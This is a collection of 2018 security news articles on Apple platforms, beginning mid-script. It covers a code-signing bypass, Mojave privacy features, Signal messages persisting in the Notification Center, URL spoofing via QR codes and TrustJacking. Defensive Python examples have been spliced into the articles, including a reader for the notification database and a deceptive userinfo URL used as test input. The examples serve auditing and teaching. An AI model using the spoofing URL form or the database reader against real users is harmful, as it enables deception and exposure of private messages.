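    return bytes(buf)


if __name__ == "__main__":
    import sys
    for path in sys.argv[1:]:
        with open(path, "rb") as fh:
            data = fh.read()
        findings = audit_fat(data)
        print(path, "OK" if not findings else "\n  " + "\n  ".join(findings))
```

This checks only header consistency; the signature of each slice still has to be verified separately, which is the step the affected third-party tools got wrong.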

Okta Rex contacted Apple on February 22, 2018 with a report and proof of concept examples that were able to bypass third-party security tools. Apple responded in March by saying it did not see this issue as a security problem that it should directly address.

Okta Rex disagreed, and informed Apple that it would notify third-party developers itself so that they could address the issues at their end. By early April it had notified — through CERT/CC — all known affected third party developers. These include VirusTotal, Google, Facebook, Objective Development, F-Secure, Objective-See, Yelp, and Carbon Black.

The researcher also recommended to CERT/CC on April 18 "that a public blog post is the best method for reaching third parties that use code signing APIs in a private manner."

The researcher is not aware of any prior abuse of this technique by bad actors. Nevertheless, by exploiting this vulnerability, a threat actor could trick third-party security tools into believing their code is Apple-approved, letting malicious code live on a macOS machine until it’s patched.

All New Privacy and Security Features Coming in macOS 10.14 Mojave
8.6.2018 thehackernews  Apple

At Worldwide Developer Conference 2018 on Monday, Apple announced the next version of its macOS operating system, and it's called Mojave.
Besides introducing new features and improvements of macOS 10.14 Mojave—like Dark Mode, Group FaceTime, Dynamic Desktop, and Finder—at WWDC, Apple also revealed a bunch of new security and privacy features coming with the next major macOS update.
Apple CEO Tim Cook said the new features included in Mojave are "inspired by pro users, but designed for everyone," helping protect you from various security threats.
Here's a list of all macOS Mojave security and privacy features:
Safari's Enhanced "Intelligent Tracking Prevention"
It's no longer shocking that your online privacy is being invaded, and everything you search online is being tracked—thanks to third-party trackers present on the Internet in the form of social media like and sharing buttons that marketers and data brokers use to monitor web users as they browse.

But not anymore. With macOS Mojave, Safari has updated its "Intelligent Tracking Prevention"—a feature that limits the ability of websites to track users with various ad-tracking and device fingerprinting techniques.
The all-new enhanced Intelligent Tracking Prevention will now automatically block all third-party trackers, including social media "Like" or "Share" buttons, as well as comment widgets from tracking users without their permission.
Safari will also help in defeating the "device fingerprinting" approach by exposing only generic configuration information of users' device and default fonts.
End-to-End Encrypted Group FaceTime (Up to 32 People)

This is a significant security improvement: at WWDC 2018, Apple introduced a group FaceTime feature that lets groups of up to 32 people hold a video call at the same time, with end-to-end encryption just like the existing one-to-one audio and video calls and group audio calls.
End-to-end encryption for group calls in the FaceTime app means that neither Apple nor anyone else can decrypt the data while it is in transit between devices.
macOS Mojave Will Alert When Your Camera & Mic Are Accessed
As we have reported several times in the past few years, cybercriminals have been spreading new macOS malware that targets the built-in webcam and microphone to spy on users without detection.

To address this threat, macOS Mojave adds a new feature that monitors access to your macOS webcam/microphone and alerts you with new permission dialogues whenever an app tries to access the camera or microphone.
This new protection has primarily been designed to prevent malicious software from silently turning on these device features in order to spy on its users.
Excessive Data Access Request User Permissions
macOS Mojave also adds similar permission requirements for apps to access personal data like mail database, message history, file system and backups.
By default, the macOS Mojave will also protect your location information, contacts, photos, Safari data, mail database, message history, iTunes device backups, calendar, reminders, time machine backups, cookies, and more.
Secure (and Convenient) Password Management
We have long warned users to deploy a good password practice by keeping their passwords strong and unique for every website or service. Now, Apple has made it easier in macOS 10.14 Mojave and iOS 12.
While Safari in macOS has provided password suggestions for years when users are asked to create a login at a site, Apple has improved this feature in a way that Safari now automatically generates strong passwords, enters them into the web browser, and stores them in the iCloud keychain when users create new online accounts.
Previously, third-party password manager apps handled most of these tasks; now Apple is integrating such functionality directly into the next major versions of both macOS and iOS.

The company also announced a new feature that even flags reused passwords so that users can change them, a new interface that autofills one-time passwords provided by authentication apps, and a mechanism that shares passwords across all of a user's nearby devices, including iOS devices, Macs, and Apple TVs.
macOS Mojave Moves Software Updates from App Store to System Preferences
With the new macOS Mojave, Apple has also redesigned its Mac App Store a little bit and moved the system update mechanism to the System Preferences from the Mac App Store.
Apple has reintroduced "Software Update" option in the System Preferences windows, allowing users to update their operating system and native software without opening the App Store.
Moreover, Apple has also confirmed that Mojave will be its last version of macOS to support legacy 32-bit apps.
As in High Sierra, users will be shown a dialog box when opening 32-bit apps in macOS 10.14 Mojave (beta 1) with a message telling them that "This app will not work with future versions of macOS."

Here's How to Download All the Data Apple Collects About You
7.6.2018 thehackernews Apple

Apple is making it easier for its users to download the data the company has collected about them so far.
On Wednesday, Apple just launched a new Data and Privacy website that allows you to download everything that the company knows about you, from Apple ID info, device info, App Store activity, AppleCare history, your online shopping habits to all of your data stored in its iCloud.
A similar feature was recently offered by Facebook, enabling its users to download all of their data, not only what they have posted, but also information like facial recognition and location data, following the Cambridge Analytica scandal.
Apple has currently made this feature available only to people with accounts in the European Union (along with Iceland, Liechtenstein, Norway and Switzerland), to comply with the General Data Protection Regulation (GDPR), which goes into effect on May 25.

However, Apple is planning to roll out this feature worldwide in the coming months. "We intend to provide these capabilities to customers around the world in the coming months," the company wrote.
The new GDPR act was passed with the aim of transforming the way companies handle users' personal data, giving users more control over it. The act applies to all companies that collect data on EU residents, regardless of where they are based.
The GDPR will replace the British Data Protection Act 1998 from 25 May 2018.
The government has also warned businesses that if they fail to make changes in their policies before Friday, they could face fines of up to £17 Million (more than $22 Million), or 4% of their global turnover—whichever amount is higher.
That's why big companies like Apple have decided to inform their European customers about the new privacy policies.
Here's How to Download Your Data:
You can download all your data with a few simple clicks on the privacy portal.
Log in to privacy.apple.com on your Mac, PC, or iPad.
Select the Get started link under the "Obtain a copy of your data" heading in Manage your data.
You can press 'Select All' to download everything or tick the boxes of the data categories you want to download. iCloud data is listed separately because it may be large and can take a long time to download.
Apple splits the data into chunks ranging from 1 GB up to a maximum of 25 GB, letting you select your preferred maximum file size. Select a size and hit 'Continue.'
Your download is now in progress, and Apple will send you an email when the files are available to download, which can take up to a week. Your downloaded data is then automatically deleted after 2 weeks.

Here's the List of Data that You can Download:
App Store, iTunes Store, iBooks Store and Apple Music activity
Apple ID account and device information
Apple Online Store and Retail Store activity
AppleCare support history, repair requests and more
Game Center activity
iCloud Bookmarks and Reading List
iCloud Calendars and Reminders
iCloud Contacts
iCloud Notes
Maps Report an Issue
Marketing subscriptions, downloads, and other activity
Other data
iCloud Drive files and documents
iCloud Mail
iCloud Photos
Besides the data download feature, Apple is also providing an option to permanently delete all of your data, which has been made available globally starting today. Once you initiate the deletion, the company can take up to 7 days to approve the request.
But keep in mind: Once deleted, there is no way you can retrieve your data.

Apple Touts Privacy Features of New Operating Systems
6.6.2018 securityweek Apple

Apple on Monday said new operating systems powering its mobile devices and computers would include features designed to thwart the use of secret trackers to monitor people's online activities.

The announcement by Apple comes amid a growing focus on protecting privacy following a Facebook data scandal and new rules being enforced by the European Union for online services.

Apple, kicking off its annual developers conference, announced that coming versions of software powering iPhone and Mac computers will block the use of so-called "cookies" from "like" buttons that can follow people from one website to another.

"Turns out 'like' buttons and 'comment' fields can be used to track you, so this year we are shutting that down," Apple senior vice president of software engineering Craig Federighi told a standing-room crowd of some 6,000 developers at Apple's Worldwide Developers Conference in the heart of Silicon Valley.

New macOS Mojave and iOS 12 software to be released later this year will also make it harder for trackers to create "unique fingerprints" by gleaning data about the devices being used, according to Federighi.

"It will become dramatically more difficult for data companies to identify your device and track you," Federighi said.

"We are bringing all these protections to both Mojave and iOS 12."

Enhanced privacy was part of a slew of improvements touted by Apple to developers, whose creations are key to the popularity of iPhones, iPads and Mac computers.

Apple's software upgrades also include features that help users understand how much time they are spending on their devices, amid concerns of growing smartphone "addiction."

Apple Boosts Security in iOS 12, macOS Mojave
6.6.2018 securityweek Apple

At its Worldwide Developers Conference (WWDC) 2018 this week, Apple shared information on the security improvements that iOS 12 and macOS Mojave are set to bring when they arrive this fall.

While previewing the next platform iterations at the event, Apple revealed features that will change the overall user experience on both mobile and desktop devices, but also presented enhancements that should improve the overall privacy and security of its users.

One of the main changes impacts the Safari browser on both iOS and macOS, which will soon deliver improved Intelligent Tracking Prevention capabilities, preventing social media buttons (such as “Like” and “Share”) from tracking users without permission.

“Safari now also presents simplified system information when users browse the web, preventing them from being tracked based on their system configuration,” the iPhone maker says.

Other features the company previewed for the upcoming platform iterations include end-to-end encryption for Facetime group calls and password managers integrated into macOS and iOS, to help users employ stronger passwords, store them securely, and automatically enter them when needed.

“Safari now also automatically creates, autofills and stores strong passwords when users create new online accounts and flags reused passwords so users can change them,” Apple said.

On macOS Mojave, new data protections will require applications to ask for user permission before using the camera and microphone or before accessing personal data such as mail history and messages database, the tech giant also says. This should prevent malicious software from spying on users.

To further strengthen user privacy, Apple also appears set to roll out a USB Restricted Mode in iOS 12, a feature that was initially noticed in iOS 11.3 beta, but later removed, only to be introduced in iOS 11.4 beta again.

With this new feature, an iPhone connected via USB to a computer (or a USB accessory) will ask for the passcode every week, or it will lock down the Lightning port in charge-only mode, thus preventing access to the data.

“To improve security, for a locked iOS device to communicate with USB accessories you must connect an accessory via lightning connector to the device while unlocked—or enter your device passcode while connected—at least once a week,” Apple described the feature in iOS 11.3 beta.

As ElcomSoft’s Oleg Afonin pointed out last month, this means that law enforcement agencies attempting to retrieve data from a suspect’s iPhone will only have a small window of opportunity before the device locks down. The same applies to thieves and anyone else targeting that data.

The new feature appears as a reaction to a clash with the FBI a couple of years ago over the unlocking of the San Bernardino shooter’s iPhone. The legal battle eventually sparked a debate between supporters of backdoors in user products to facilitate criminal and national security investigations, and those who want data to be properly protected.

Later this month, as part of iOS 12 public beta, users will also take advantage of increased control over notifications, and will get detailed information on the time spent on the phone, courtesy of a new Screen Time feature. There’s also an App Limits feature to limit the time spent in an app, which gives parents more control over their children’s use of a mobile device.

ProtonMail Launches VPN Application for macOS
1.6.2018 securityweek  Apple

Encrypted email service provider ProtonMail on Wednesday announced the availability of a virtual private network (VPN) service for macOS users.

Initially introduced for some of its paid ProtonMail users in early 2017, the VPN service saw a wider launch on Windows last year, and also arrived on Android in January 2018. Last year, the CERN-founded company also launched a Tor hidden service and an encrypted contacts manager.

Following a beta testing period, the Swiss-based service provider is now making the VPN application available for all macOS users, allowing them to easily protect their Internet connections. Users who already have a ProtonVPN or ProtonMail account only need to download the application, log in, and start using it immediately.

Developed by the same team behind ProtonMail, the VPN service takes advantage of technologies such as Secure Core and Tor integration and is available for free with no ads. Furthermore, the company claims that users can enjoy it without worrying about malware or monetization of user data.

“With our VPN for Mac application, it is now extremely simple to switch countries, create custom profiles, connect to the Tor network, and route your traffic through our Secure Core servers. Not to mention all the essential perks of ProtonVPN, like hiding your IP address, defending against cyber-attacks, and unblocking censored content,” ProtonMail says.

Users opting for the free plan get unlimited bandwidth and access to servers in three continents. Upgrade options are available for those looking to gain access to more servers and extra features.

Many members of the ProtonMail community have requested the macOS app, the company says. Over the past months, the service provider has worked closely with over ten thousand beta testers to address bugs in the application and ensure it is not only easy to use, but also visually appealing.

The macOS app also takes advantage of the modern IKEv2 protocol for higher performance, providing users with a faster and more stable connection (it promises speeds of more than 300 Mbps, under the right conditions).

Users will be able to easily connect to any country with a single click, to choose from the available Secure Core servers, Tor servers, and P2P servers, and to create and save custom connection profiles. A VPN kill switch is also available, designed to cut the Internet if the connection to the VPN drops, thus preventing data from leaking when the VPN is not connected.

“More people are starting to wake up to the fact that privacy matters, and it is important to make tools like VPN widely accessible, especially for the over 1.5 billion people around the world who live under Internet surveillance and censorship,” Dr. Andy Yen, CEO of ProtonMail, said in a statement.

Self-destructing messages received on 'Signal for Mac' can be recovered later
11.5.2018 thehackernews Apple

It turns out that the macOS client for the popular end-to-end encrypted messaging app Signal fails to properly delete disappearing (self-destructing) messages from the recipient's system, leaving the content of your sensitive messages at risk of exposure.
For those unaware, the disappearing messages in Signal self-destruct after a particular duration set by the sender, leaving no trace of it on the receiver's device or Signal servers.
However, security researcher Alec Muffett noticed that the messages that are supposed to be "disappearing" can still be seen—even if they are deleted from the app.
Another security researcher Patrick Wardle reproduced the issue and explained that macOS makes a copy (partial for long messages) of disappearing messages in a user-readable database of macOS's Notification Center, from where they can be recovered anytime later.
If you want to keep an eye on your incoming messages without obsessively checking your inbox, macOS desktop notifications (banners and alerts), which appear in the upper-right corner of your screen, are a great way to be alerted to things you don't want to miss.

According to a blog post published by Wardle, if you have enabled notifications for Signal app, the service will show you notifications for the disappearing messages as well in the form of truncated messages (which is generally 1-1.5 lines of the full message).
Now, sharing incoming disappearing messages with the notification system leads to two privacy issues:
"Disappearing" messages may remain in the User Interface of macOS Notification Center even after being deleted within the Signal app and can be seen in the notification bar until manually closed by the user.
In the backend, the SQLite database of Notification Center also keeps a copy of truncated messages, which can be accessed with normal user permissions, or by a malicious app installed on the system.
Wardle suggests either Signal should not provide notifications service for disappearing messages or should explicitly delete such notifications from the system’s database when it removes the messages from the app UI.
Meanwhile, to protect the content of your sensitive messages so that no malicious app, hacker or your wife can recover them, you should consider disabling notifications service until Signal patches this issue.

Signal disappearing messages can be recovered by the macOS client
10.5.2018 securityaffairs  Apple

The macOS client for the Signal fails to properly delete disappearing messages from the recipient’s system, potentially exposing sensitive messages.
Signal is considered the most secure instant messaging app; a quick Internet search turns up Edward Snowden’s endorsement:

“Use anything by Open Whisper Systems” Snowden says.

The cryptographer and Johns Hopkins University professor Matt Green and the well-known security expert Bruce Schneier are two other admirers of the Signal app.

Signal was also approved by the U.S. Senate for official communications among staff members.

But even the most sophisticated and well-engineered software can be affected by severe bugs.

The disappearing messages in Signal are automatically deleted after a specific interval of time set up by the sender. The peculiarity of the feature is that there is no trace of the destroyed message on the receiver’s device or Signal servers, at least this is the expected behavior.

The security expert Alec Muffett discovered that messages which have already disappeared can still be recovered from the recipient’s device.

Alec Muffett tweeted on May 8, 2018: “#HEADSUP: #Security Issue in #Signal. If you are using the @signalapp desktop app for Mac, check your notifications bar; messages get copied there and they seem to persist — even if they are "disappearing" messages which have been deleted/expunged from the app.”

Former NSA hacker and security expert Patrick Wardle analyzed the issue and found that the macOS client leaves a copy (partial, for long messages) of disappearing messages in a user-readable database belonging to macOS’s Notification Center. This copy can be recovered at any time by researchers or attackers.

“While the application deletes the messages (once the ‘disappear’ time is hit) from the app’s UI – the message may still remain in macOS’s Notification Center.” wrote Wardle.

“This apparently occurs because:

Signal displays (posts) a message notification (with the content of the message) to the Notification Center (if the app is not in the foreground).
The OS automatically dismisses the notification ‘banner’ … but the notification (which contains the message contents) remains in the Notification Center.
Signal does not explicitly delete this notification when it deletes messages from the app UI.”

To discover where the disappearing messages are stored, Wardle used macOS’s built-in file monitoring utility ‘fs_usage.’

“Looks like the ‘user notification daemon’ (usernoted) is accessing a file related to a database (specifically a SQLite write-ahead log).” added the expert.

“Running the ‘file’ command on the ‘db2/db’ file reveals (rather unsurprisingly) it’s an SQLite database, that is readable with user (i.e. non-root) permissions”

Wardle noticed the ‘record’ table that contains the notifications, including their contents.


The data is stored as a binary blob, so Wardle converted it from hex to ASCII and found the header “bplist00”. That marks a binary plist, which can easily be decoded/parsed using the biplist module.

The decoded text included the text of all Signal messages, including the disappearing messages.
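
The steps above (open the Notification Center SQLite database, read the ‘record’ table, recognise the bplist00 header and decode it) can be turned into a small audit that tells a user which notification bodies are still being retained on their own Mac. The following is an added example written for this page, not Wardle’s tooling or Signal’s code. It assumes the ‘record’ table has a BLOB column named ‘data’ holding one binary plist per notification, and it uses the standard-library plistlib rather than biplist; the Signal bundle identifier and the key names inside the plist are assumptions. Because it has to run anywhere, it builds a constructed in-memory database in that shape; `audit_real_db` shows how the same function would be pointed at the real file.

```python
"""Audit which notification bodies persist in a macOS Notification Center
database (added example, not Wardle's or Signal's code).

Assumptions: the database (on 10.13 located under
$(getconf DARWIN_USER_DIR)/com.apple.notificationcenter/db2/db) has a
'record' table with a BLOB column 'data', each blob being a binary plist.
"""
import plistlib
import sqlite3

BPLIST_MAGIC = b"bplist00"  # header Wardle saw when converting the blob to ASCII


def make_sample_db():
    """Constructed in-memory database mimicking the assumed usernoted schema."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE record (rec_id INTEGER PRIMARY KEY, app TEXT, data BLOB)")
    samples = [  # constructed sample notifications; bundle id and keys are assumptions
        ("org.whispersystems.signal-desktop",
         {"req": {"titl": "Alice", "body": "meet at 9 (disappearing)"}}),
        ("com.apple.mail", {"req": {"titl": "Inbox", "body": "Weekly report"}}),
    ]
    for app, payload in samples:
        blob = plistlib.dumps(payload, fmt=plistlib.FMT_BINARY)
        conn.execute("INSERT INTO record (app, data) VALUES (?, ?)", (app, blob))
    conn.commit()
    return conn


def decode_blob(blob):
    """Return the decoded plist if the blob is a binary plist, else None."""
    if not blob.startswith(BPLIST_MAGIC):
        return None
    return plistlib.loads(blob)


def extract_strings(obj, out=None):
    """Recursively collect every string value in a decoded plist."""
    if out is None:
        out = []
    if isinstance(obj, str):
        out.append(obj)
    elif isinstance(obj, dict):
        for value in obj.values():
            extract_strings(value, out)
    elif isinstance(obj, (list, tuple)):
        for value in obj:
            extract_strings(value, out)
    return out


def persisted_notifications(conn, app_filter=None):
    """List (app, strings) for every notification record still in the DB."""
    found = []
    for app, blob in conn.execute("SELECT app, data FROM record"):
        if app_filter and app != app_filter:
            continue
        decoded = decode_blob(blob)
        if decoded is None:
            continue
        found.append((app, extract_strings(decoded)))
    return found


def audit_real_db(path):
    """Open the real database read-only (same assumed layout) and audit it."""
    conn = sqlite3.connect(f"file:{path}?mode=ro", uri=True)
    try:
        return persisted_notifications(conn)
    finally:
        conn.close()


if __name__ == "__main__":
    for app, strings in persisted_notifications(make_sample_db()):
        print(app, "->", strings)
```

Any string returned for a messaging app is content that outlived the app’s own deletion; if the audit shows such entries, the practical mitigation on the user side is to clear notifications for that app, and on the app side to post notifications without the message body or to remove them programmatically when the message expires.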

“Well Alec, hope this explains exactly why those ‘disappearing’ Signal messages still are hanging around. In short, anything that gets displayed as a notification (yes, including ‘disappearing’ Signal messages) in the macOS Notification Center, is recorded by the OS.” concluded Wardle.
“If the application wants the item to be removed from the Notification Center, it must ensure that the alert is dismissed by the user or programmatically! However, it is not clear that this also ‘expunges’ the notifications (and their contents) from the notification database… I’m guessing not! If this is the case, Signal may have to avoid generating notifications (containing the message body) for disappearing messages…”

The good news is that Signal’s iOS application is not affected, or at least the messages are removed from the iOS Notification Center once the user has viewed them.

Apple Patches macOS, iOS, Safari
26.4.2018 securityweek Apple

Apple this week released patches to address a handful of security vulnerabilities in macOS, iOS, and Safari.

Available for macOS High Sierra 10.13.4, Security Update 2018-001 addresses two vulnerabilities impacting Crash Reporter and LinkPresentation, respectively.

The first is a memory corruption issue that could allow an application to gain elevated privileges. Tracked as CVE-2018-4206, the security flaw was reported by Ian Beer of Google Project Zero. Apple addressed the bug with improved error handling.

The tech company also resolved a spoofing issue in the handling of URLs, which could result in UI spoofing when processing a maliciously crafted text message. Tracked as CVE-2018-4187 and reported by Zhiyang Zeng, of Tencent Security Platform Department, and Roman Mueller, the issue was addressed with improved input validation.

In a blog post in March, Mueller explained that the vulnerability was introduced when Apple added QR code reading capabilities to the camera app and that it resides in the application being unable to correctly detect the hostname in a URL.

Thus, a malicious actor could craft a QR code that, when read with the camera app, would display a different hostname in the notification shown to the user than the domain Safari would actually access.
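
The defensive lesson of this bug class is that the hostname a user is shown must come from a proper URL parser, never from a string shortcut. The following is an added example for this page, not Apple’s code and not Mueller’s proof of concept; the page does not reproduce his exact QR payload, so the ambiguous sample URL below is a constructed illustration of the generic userinfo@host form (a standard RFC 3986 component) that commonly fools naive parsers, using placeholder domains. The check compares the host a shortcut parser would display with the host a standards-compliant client would actually contact and refuses to vouch for the URL whenever they differ or userinfo is present.

```python
"""Defensive hostname extraction for URLs shown to a user before they are
opened (added example; not Apple's or Mueller's code)."""
from urllib.parse import urlsplit


def naive_hostname(url):
    """The kind of shortcut that produces this bug class: take the text after
    '://' up to the first '/' or ':' and call it the host."""
    rest = url.split("://", 1)[1] if "://" in url else url
    authority = rest.split("/", 1)[0]
    return authority.split(":", 1)[0]


def real_hostname(url):
    """Hostname a standards-compliant client actually connects to: urlsplit
    strips userinfo and port and lowercases the host."""
    return urlsplit(url).hostname


def display_is_safe(url):
    """True only when the URL uses http(s), carries no userinfo, and the
    naive and real hostnames agree, i.e. a preview would not mislead."""
    parts = urlsplit(url)
    if parts.scheme not in ("http", "https") or not parts.hostname:
        return False
    if parts.username is not None or parts.password is not None:
        return False
    return naive_hostname(url).lower() == parts.hostname


def preview_label(url):
    """Text a notification could safely show: the real host, or a warning."""
    if display_is_safe(url):
        return f"Open {real_hostname(url)}"
    return f"Open {real_hostname(url) or '?'} (unusual URL, check before opening)"


if __name__ == "__main__":
    # constructed sample: placeholder domains, the form a naive parser gets wrong
    for sample in ("https://trusted.example/login",
                   "https://trusted.example:443@other.example/"):
        print(sample, "->", naive_hostname(sample), "|", real_hostname(sample),
              "|", preview_label(sample))
```

The second sample makes the point: a shortcut parser reports the placeholder ‘trusted.example’ while the client would connect to ‘other.example’, which is exactly the mismatch between notification and destination the article describes.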

Both of these issues were resolved in iOS 11.3.1 as well, which is now available for iPhone 5s and later, iPad Air and later, and iPod touch 6th generation. Additionally, the iOS update patches two bugs in WebKit.

Both of these bugs are memory corruption issues that could lead to arbitrary code execution when processing maliciously crafted web content. To resolve these vulnerabilities, Apple improved state management and memory handling, respectively.

The first of these bugs is tracked as CVE-2018-4200 and was found by Ivan Fratric of Google Project Zero. Tracked as CVE-2018-4204, the second issue was reported by Richard Zhu, working with Trend Micro's Zero Day Initiative.

Now available for OS X El Capitan 10.11.6, macOS Sierra 10.12.6, and macOS High Sierra 10.13.4, the newly released Safari 11.1 includes patches for both WebKit vulnerabilities.

'iTunes Wi-Fi Sync' Feature Could Let Attackers Hijack Your iPhone, iPad Remotely
25.4.2018 thehackernews  Apple

Be careful while plugging your iPhone into a friend's laptop for a quick charge or sharing selected files.
Researchers at Symantec have issued a security warning for iPhone and iPad users about a new attack, which they named "TrustJacking," that could allow someone you trust to remotely take persistent control of, and extract data from, your Apple device.
Apple provides an iTunes Wi-Fi sync feature in iOS that allows users to sync their iPhones to a computer wirelessly. To enable this feature, users have to grant one-time permission to a trusted computer (with iTunes) over a USB cable.
Once enabled, the feature allows the computer owner to secretly spy on your iPhone over the Wi-Fi network without requiring any authentication, even when your phone is no longer physically connected to that computer.
"Reading the text, the user is led to believe that this is only relevant while the device is physically connected to the computer, so assumes that disconnecting it will prevent any access to his private data," Symantec said.
Since there is no noticeable indication on the victim's device, Symantec believes the feature can be abused to exploit the "relation of trust the victim has between his iOS device and a computer."

The researchers describe the following scenarios in which a TrustJacking attack can succeed, especially when you trust the wrong computer:
Connecting your phone to a free charger at an airport and mistakenly approving the pop-up permission message to trust the connected station.
A remote attacker who is not on the same Wi-Fi network can also access iPhone data if the device owner's own "trusted" PC or Mac has been compromised by malware.
Moreover, iTunes Wi-Fi sync feature could also be used to remotely install malware apps on your iPhone, as well as to download a backup and steal all your photos, SMS / iMessage chats history, and application data.
"An attacker can also use this access to the device to install malicious apps, and even replace existing apps with a modified wrapped version that looks exactly like the original app, but is able to spy on the user while using the app and even leverage private APIs to spy on other activities all the time," Symantec said.
The TrustJacking attack could also allow trusted computers to watch your device's screen in real-time by repeatedly taking remote screenshots, observing and recording your every action.

After being notified by the Symantec researchers, Apple introduced another security layer in iOS 11, asking users to enter their iPhone's passcode when pairing their iPhone with a computer.
However, Symantec says the loophole remains open, as the patch does not address the primary concern, i.e., the absence of noticeable indication or mandatory re-authentication between the user's device and the trusted computer after a given interval of time.
"While we appreciate the mitigation that Apple has taken, we’d like to highlight that it does not address Trustjacking in a holistic manner," Symantec's Roy Iarchy said. "Once the user has chosen to trust the compromised computer, the rest of the exploit continues to work as described above."
The best and simplest way to protect yourself is to ensure that no unwanted computers are trusted by your iOS device. For this, you can clear the trusted computers list by going to Settings → General → Reset → Reset Location & Privacy.
Also, most importantly, always deny access when asked to trust the computer while charging your iOS device. Your device will still charge from the computer without exposing your data.

New Tool Detects Evil Maid Attacks on Mac Laptops
25.4.2018 securityweek Apple

A security researcher has developed a simple tool that helps Mac laptop owners detect unauthorized physical access to their device, also known as an evil maid attack, by monitoring its lid.

The free tool, named DoNotDisturb (DND), was created by Patrick Wardle, co-founder and chief research officer at enterprise macOS security company Digita Security.

Leaving a laptop unattended – for example, leaving it in the hotel room while traveling – puts the device at risk of evil maid attacks. An attacker who has physical access to the targeted device may steal data from it or install malicious software without leaving any obvious evidence behind.

The DND tool attempts to address this issue on Mac laptops by monitoring lid events. A majority of evil maid attacks require the attacker to open the device’s lid. However, there are some types of physical attacks that do not require opening the device’s lid, and the tool works based on the premise that the user closes the device’s lid when leaving it unattended.

DND is a simple tool, but it does include some interesting features and options. Users can configure the app to start at login and run in passive mode, which means it will run silently without any visible alerts. The “No Icon” mode ensures that an icon is not displayed in the macOS/OS X menu bar, making the tool even stealthier.


The main tool installed on the monitored Mac laptop can be paired with an iOS application that allows the user to view alerts and respond to them. The iOS app can be used to dismiss an alert, take a picture of the individual using the monitored laptop, and remotely shut down the device. While the macOS tool is free, users have to pay a monthly or yearly subscription fee ($9.99 per year) to use the iOS companion for more than one week. The iOS app is optional, but without it users will not receive alerts and cannot take any action remotely in case of an attack.

DND can be configured to take specific actions when the device’s lid is opened. For example, it can execute a script or a binary file, or it can start tracking the attacker’s activities, including new processes, new logins, and USB device insertions.

For users who want to keep DND active on their device at all times but do not want the app to trigger an alert whenever they open the laptop’s lid themselves, the tool can be configured to ignore lid events in specific cases. However, this setting requires a newer model Mac laptop that has a touch bar and is running macOS 10.13.4 or newer.

“When this mode is enabled, DND will ignore any lid open events if preceded by a successful touch ID authentication event within 10 seconds. The idea is that this allows one to tell DND to trust (or ignore) a lid event that is a result of you (vs. somebody else) opening your laptop,” Wardle explained.
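
To make the lid-monitoring premise concrete, here is a stripped-down monitor in the same spirit, written as an added example for this page; it is not DND’s source code. It assumes that on macOS `ioreg -r -k AppleClamshellState -d 4` prints a line containing `"AppleClamshellState" = Yes` while the lid is closed and `= No` once it is open. The parser and the transition detector are separate from the polling loop so they can be exercised with constructed ioreg output on any platform; on a Mac, `monitor()` polls the real registry, and on a closed-to-open transition records the timestamp and a snapshot of current logins, which is one of the activity classes DND tracks.

```python
"""Minimal lid-open monitor (added example, not DND's code). Assumption:
ioreg reports '"AppleClamshellState" = Yes' when the lid is closed."""
import datetime
import re
import shutil
import subprocess
import time

CLAMSHELL_RE = re.compile(r'"AppleClamshellState"\s*=\s*(Yes|No)')


def lid_state(ioreg_output):
    """Return 'closed', 'open' or 'unknown' from ioreg text."""
    match = CLAMSHELL_RE.search(ioreg_output)
    if not match:
        return "unknown"
    return "closed" if match.group(1) == "Yes" else "open"


def read_lid_state():
    """Query the real I/O registry (macOS only); 'unknown' elsewhere."""
    if shutil.which("ioreg") is None:
        return "unknown"
    out = subprocess.run(["ioreg", "-r", "-k", "AppleClamshellState", "-d", "4"],
                         capture_output=True, text=True, check=False).stdout
    return lid_state(out)


def detect_transitions(states):
    """Indexes in a sampled state sequence where the lid went closed -> open,
    i.e. the events an evil-maid monitor alerts on."""
    return [i for i in range(1, len(states))
            if states[i - 1] == "closed" and states[i] == "open"]


def snapshot_logins():
    """Capture who is logged in when the lid opens (`who` exists on macOS)."""
    if shutil.which("who") is None:
        return ""
    return subprocess.run(["who"], capture_output=True, text=True, check=False).stdout


def monitor(interval=2.0, iterations=None):
    """Poll the lid; log closed->open transitions with timestamp and logins.
    iterations=None polls forever."""
    prev = read_lid_state()
    done = 0
    while iterations is None or done < iterations:
        time.sleep(interval)
        cur = read_lid_state()
        if detect_transitions([prev, cur]):
            stamp = datetime.datetime.now().isoformat(timespec="seconds")
            print(f"[{stamp}] lid opened; current logins:\n{snapshot_logins()}")
        prev = cur
        done += 1


if __name__ == "__main__":
    monitor()
```

Like DND itself, this only observes lid events, so it says nothing about attacks that never open the lid; its value is the tamper-evident timestamp for the common case.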

Wardle is well known on the Mac hacking scene thanks to the useful apps he has released and the vulnerabilities he has found in both Apple’s own code and third-party software.

iOS users can now use Google prompt on their devices via the Gmail app
20.4.2018 securityaffairs Apple

Google announced that iOS users can now benefit from the Google prompt feature via their Gmail application. Security and usability are both crucial requirements for Google.
Google announced that iOS users can now receive Google prompts via their Gmail application.

“In 2017, we made Google prompt the primary choice for G Suite users turning on two-step verification for the first time. Back then, we noted that users with iOS devices would need to install the Google app in order to use the feature.” reads the blog post published by Google.

“Today, we’re making it possible for users with iOS devices to receive prompts via their Gmail app as well. This should encourage more people to use Google prompt, which is an easier and more secure method of authenticating an account.”


Google prompt was designed to inform users of any attempt to log into their accounts and confirm it with a tap on their mobile devices.

Gmail users have been able to approve sign-in requests via 2-Step Verification (2SV) by simply tapping a “Yes” button on their smartphone since June 2016.

The traditional 2-Step Verification process relies on a login authentication code sent via SMS; once the user has received it, they need to enter it on the sign-in page.

The tech giant launched Google prompt to make this process simpler: it displays a popup message on the user’s mobile device asking them to confirm the login with a single tap.

Google prompt was rolled out to both Android and iOS devices, but on iOS, the users need to have the Google Search app installed.

In October 2017, Google introduced Google prompt in G Suite. The company made the feature available to all of its users who chose to enable the extra layer of security, but in order to use it, iOS users needed to have the Google app installed on the device.

Now Google has removed this limitation, and iOS users can benefit from Google prompt without having the Google app installed.

iOS users who have both the Google app and Gmail app installed on their devices will receive the prompts from Gmail.

Google prompt in Gmail for iOS will be available to all users within a few days.

Google Prompt Arrives in Gmail for iOS
20.4.2018 securityweek Apple

Google this week announced that iOS users can now receive Google prompts via their Gmail application.

First released in June 2016 as a new 2-Step Verification (2SV) functionality, Google prompt allows users to confirm an attempt to log into their accounts with a single tap on their mobile devices.

Typical 2SV processes involve receiving an SMS with a login code that needs to be entered on a sign-in page, a step that can prove inconvenient at times. To eliminate this, the search giant launched Google prompt, which displays a popup message on the user’s mobile device asking them to confirm the login.

The feature was rolled out to both Android and iOS devices right from the start. On iOS, however, users had to have the Google Search app installed to take advantage of the feature.

